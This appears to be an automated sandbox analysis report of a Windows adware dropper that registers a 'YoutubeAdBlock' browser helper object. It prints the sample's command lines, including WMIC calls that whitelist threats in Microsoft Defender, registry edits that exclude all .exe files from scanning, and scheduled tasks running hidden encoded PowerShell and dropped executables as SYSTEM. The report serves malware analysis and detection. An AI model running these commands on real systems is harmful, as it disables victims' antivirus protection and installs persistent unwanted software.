Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\kYCDidaec.dll"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\bhBhhGC.exe"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ = "{601F87D8-13CD-4AEA-83DA-960D9654B38D}"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\tjjvRAW.dll"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\bhBhhGC.exe"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	sOUUgCQ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	sOUUgCQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	sOUUgCQ.exe

Suspicious behavior: EnumeratesProcesses 57 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exesOUUgCQ.exepowershell.exepowershell.exepowershell.exe

pid	process
676	powershell.exe
676	powershell.exe
1188	powershell.exe
1188	powershell.exe
924	powershell.exe
836	powershell.EXE
924	powershell.exe
2020	powershell.exe
2020	powershell.exe
1684	powershell.exe
1684	powershell.exe
1864	powershell.exe
1864	powershell.exe
1604	powershell.EXE
1260	powershell.exe
1260	powershell.exe
1600	powershell.exe
1600	powershell.exe
680	powershell.exe
680	powershell.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
1672	powershell.exe
1672	powershell.exe
1496	powershell.exe
1496	powershell.exe
1960	powershell.exe
1960	powershell.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe
528	sOUUgCQ.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exepowershell.exepowershell.EXEWMIC.exe

description	pid	process
Token: SeDebugPrivilege	676	powershell.exe
Token: SeIncreaseQuotaPrivilege	956	WMIC.exe
Token: SeSecurityPrivilege	956	WMIC.exe
Token: SeTakeOwnershipPrivilege	956	WMIC.exe
Token: SeLoadDriverPrivilege	956	WMIC.exe
Token: SeSystemProfilePrivilege	956	WMIC.exe
Token: SeSystemtimePrivilege	956	WMIC.exe
Token: SeProfSingleProcessPrivilege	956	WMIC.exe
Token: SeIncBasePriorityPrivilege	956	WMIC.exe
Token: SeCreatePagefilePrivilege	956	WMIC.exe
Token: SeBackupPrivilege	956	WMIC.exe
Token: SeRestorePrivilege	956	WMIC.exe
Token: SeShutdownPrivilege	956	WMIC.exe
Token: SeDebugPrivilege	956	WMIC.exe
Token: SeSystemEnvironmentPrivilege	956	WMIC.exe
Token: SeRemoteShutdownPrivilege	956	WMIC.exe
Token: SeUndockPrivilege	956	WMIC.exe
Token: SeManageVolumePrivilege	956	WMIC.exe
Token: 33	956	WMIC.exe
Token: 34	956	WMIC.exe
Token: 35	956	WMIC.exe
Token: SeDebugPrivilege	1188	powershell.exe
Token: SeIncreaseQuotaPrivilege	1964	WMIC.exe
Token: SeSecurityPrivilege	1964	WMIC.exe
Token: SeTakeOwnershipPrivilege	1964	WMIC.exe
Token: SeLoadDriverPrivilege	1964	WMIC.exe
Token: SeSystemProfilePrivilege	1964	WMIC.exe
Token: SeSystemtimePrivilege	1964	WMIC.exe
Token: SeProfSingleProcessPrivilege	1964	WMIC.exe
Token: SeIncBasePriorityPrivilege	1964	WMIC.exe
Token: SeCreatePagefilePrivilege	1964	WMIC.exe
Token: SeBackupPrivilege	1964	WMIC.exe
Token: SeRestorePrivilege	1964	WMIC.exe
Token: SeShutdownPrivilege	1964	WMIC.exe
Token: SeDebugPrivilege	1964	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1964	WMIC.exe
Token: SeRemoteShutdownPrivilege	1964	WMIC.exe
Token: SeUndockPrivilege	1964	WMIC.exe
Token: SeManageVolumePrivilege	1964	WMIC.exe
Token: 33	1964	WMIC.exe
Token: 34	1964	WMIC.exe
Token: 35	1964	WMIC.exe
Token: SeDebugPrivilege	924	powershell.exe
Token: SeDebugPrivilege	836	powershell.EXE
Token: SeIncreaseQuotaPrivilege	1968	WMIC.exe
Token: SeSecurityPrivilege	1968	WMIC.exe
Token: SeTakeOwnershipPrivilege	1968	WMIC.exe
Token: SeLoadDriverPrivilege	1968	WMIC.exe
Token: SeSystemProfilePrivilege	1968	WMIC.exe
Token: SeSystemtimePrivilege	1968	WMIC.exe
Token: SeProfSingleProcessPrivilege	1968	WMIC.exe
Token: SeIncBasePriorityPrivilege	1968	WMIC.exe
Token: SeCreatePagefilePrivilege	1968	WMIC.exe
Token: SeBackupPrivilege	1968	WMIC.exe
Token: SeRestorePrivilege	1968	WMIC.exe
Token: SeShutdownPrivilege	1968	WMIC.exe
Token: SeDebugPrivilege	1968	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1968	WMIC.exe
Token: SeRemoteShutdownPrivilege	1968	WMIC.exe
Token: SeUndockPrivilege	1968	WMIC.exe
Token: SeManageVolumePrivilege	1968	WMIC.exe
Token: 33	1968	WMIC.exe
Token: 34	1968	WMIC.exe
Token: 35	1968	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3f51026069dac5d3e1b8c085ba90a0b0.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exe

description	pid	process	target process
PID 1028 wrote to memory of 1980	1028	3f51026069dac5d3e1b8c085ba90a0b0.exe	SimplInst.exe
PID 1028 wrote to memory of 1980	1028	3f51026069dac5d3e1b8c085ba90a0b0.exe	SimplInst.exe
PID 1028 wrote to memory of 1980	1028	3f51026069dac5d3e1b8c085ba90a0b0.exe	SimplInst.exe
PID 1028 wrote to memory of 1980	1028	3f51026069dac5d3e1b8c085ba90a0b0.exe	SimplInst.exe
PID 1028 wrote to memory of 1980	1028	3f51026069dac5d3e1b8c085ba90a0b0.exe	SimplInst.exe
PID 1028 wrote to memory of 1980	1028	3f51026069dac5d3e1b8c085ba90a0b0.exe	SimplInst.exe
PID 1028 wrote to memory of 1980	1028	3f51026069dac5d3e1b8c085ba90a0b0.exe	SimplInst.exe
PID 1980 wrote to memory of 1628	1980	SimplInst.exe	SimplInst.exe
PID 1980 wrote to memory of 1628	1980	SimplInst.exe	SimplInst.exe
PID 1980 wrote to memory of 1628	1980	SimplInst.exe	SimplInst.exe
PID 1980 wrote to memory of 1628	1980	SimplInst.exe	SimplInst.exe
PID 1980 wrote to memory of 1628	1980	SimplInst.exe	SimplInst.exe
PID 1980 wrote to memory of 1628	1980	SimplInst.exe	SimplInst.exe
PID 1980 wrote to memory of 1628	1980	SimplInst.exe	SimplInst.exe
PID 1628 wrote to memory of 1624	1628	SimplInst.exe	cmd.exe
PID 1628 wrote to memory of 1624	1628	SimplInst.exe	cmd.exe
PID 1628 wrote to memory of 1624	1628	SimplInst.exe	cmd.exe
PID 1628 wrote to memory of 1624	1628	SimplInst.exe	cmd.exe
PID 1628 wrote to memory of 1624	1628	SimplInst.exe	cmd.exe
PID 1628 wrote to memory of 1624	1628	SimplInst.exe	cmd.exe
PID 1628 wrote to memory of 1624	1628	SimplInst.exe	cmd.exe
PID 1624 wrote to memory of 1036	1624	cmd.exe	forfiles.exe
PID 1624 wrote to memory of 1036	1624	cmd.exe	forfiles.exe
PID 1624 wrote to memory of 1036	1624	cmd.exe	forfiles.exe
PID 1624 wrote to memory of 1036	1624	cmd.exe	forfiles.exe
PID 1624 wrote to memory of 1036	1624	cmd.exe	forfiles.exe
PID 1624 wrote to memory of 1036	1624	cmd.exe	forfiles.exe
PID 1624 wrote to memory of 1036	1624	cmd.exe	forfiles.exe
PID 1036 wrote to memory of 1640	1036	forfiles.exe	cmd.exe
PID 1036 wrote to memory of 1640	1036	forfiles.exe	cmd.exe
PID 1036 wrote to memory of 1640	1036	forfiles.exe	cmd.exe
PID 1036 wrote to memory of 1640	1036	forfiles.exe	cmd.exe
PID 1036 wrote to memory of 1640	1036	forfiles.exe	cmd.exe
PID 1036 wrote to memory of 1640	1036	forfiles.exe	cmd.exe
PID 1036 wrote to memory of 1640	1036	forfiles.exe	cmd.exe
PID 1640 wrote to memory of 676	1640	cmd.exe	powershell.exe
PID 1640 wrote to memory of 676	1640	cmd.exe	powershell.exe
PID 1640 wrote to memory of 676	1640	cmd.exe	powershell.exe
PID 1640 wrote to memory of 676	1640	cmd.exe	powershell.exe
PID 1640 wrote to memory of 676	1640	cmd.exe	powershell.exe
PID 1640 wrote to memory of 676	1640	cmd.exe	powershell.exe
PID 1640 wrote to memory of 676	1640	cmd.exe	powershell.exe
PID 676 wrote to memory of 956	676	powershell.exe	WMIC.exe
PID 676 wrote to memory of 956	676	powershell.exe	WMIC.exe
PID 676 wrote to memory of 956	676	powershell.exe	WMIC.exe
PID 676 wrote to memory of 956	676	powershell.exe	WMIC.exe
PID 676 wrote to memory of 956	676	powershell.exe	WMIC.exe
PID 676 wrote to memory of 956	676	powershell.exe	WMIC.exe
PID 676 wrote to memory of 956	676	powershell.exe	WMIC.exe
PID 1628 wrote to memory of 968	1628	SimplInst.exe	forfiles.exe
PID 1628 wrote to memory of 968	1628	SimplInst.exe	forfiles.exe
PID 1628 wrote to memory of 968	1628	SimplInst.exe	forfiles.exe
PID 1628 wrote to memory of 968	1628	SimplInst.exe	forfiles.exe
PID 1628 wrote to memory of 968	1628	SimplInst.exe	forfiles.exe
PID 1628 wrote to memory of 968	1628	SimplInst.exe	forfiles.exe
PID 1628 wrote to memory of 968	1628	SimplInst.exe	forfiles.exe
PID 968 wrote to memory of 1504	968	forfiles.exe	cmd.exe
PID 968 wrote to memory of 1504	968	forfiles.exe	cmd.exe
PID 968 wrote to memory of 1504	968	forfiles.exe	cmd.exe
PID 968 wrote to memory of 1504	968	forfiles.exe	cmd.exe
PID 968 wrote to memory of 1504	968	forfiles.exe	cmd.exe
PID 968 wrote to memory of 1504	968	forfiles.exe	cmd.exe
PID 968 wrote to memory of 1504	968	forfiles.exe	cmd.exe
PID 1504 wrote to memory of 1792	1504	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\3f51026069dac5d3e1b8c085ba90a0b0.exe
"C:\Users\Admin\AppData\Local\Temp\3f51026069dac5d3e1b8c085ba90a0b0.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1028

C:\Users\Admin\AppData\Local\Temp\7zSC552.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1980

C:\Users\Admin\AppData\Local\Temp\7zSC745.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:1036

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:952

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1188

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1964

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:1900

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1504

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1792

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1672

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "guYewoHNm" /SC once /ST 03:23:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1512

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "guYewoHNm"
4⤵
PID:1252

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "guYewoHNm"
4⤵
PID:1708

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bkckNrBYOjfprwtEPo" /SC once /ST 07:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\VgXfIDg.exe\" OV /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:828

C:\Windows\system32\taskeng.exe
taskeng.exe {6C0C01A7-10AB-43C8-A35A-2205A6F3D753} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1604

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:880

C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\qFoYTbmu\pWUFXAW.exe
C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\qFoYTbmu\pWUFXAW.exe pR /S
2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
PID:2028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1012

C:\Windows\SysWOW64\forfiles.exe
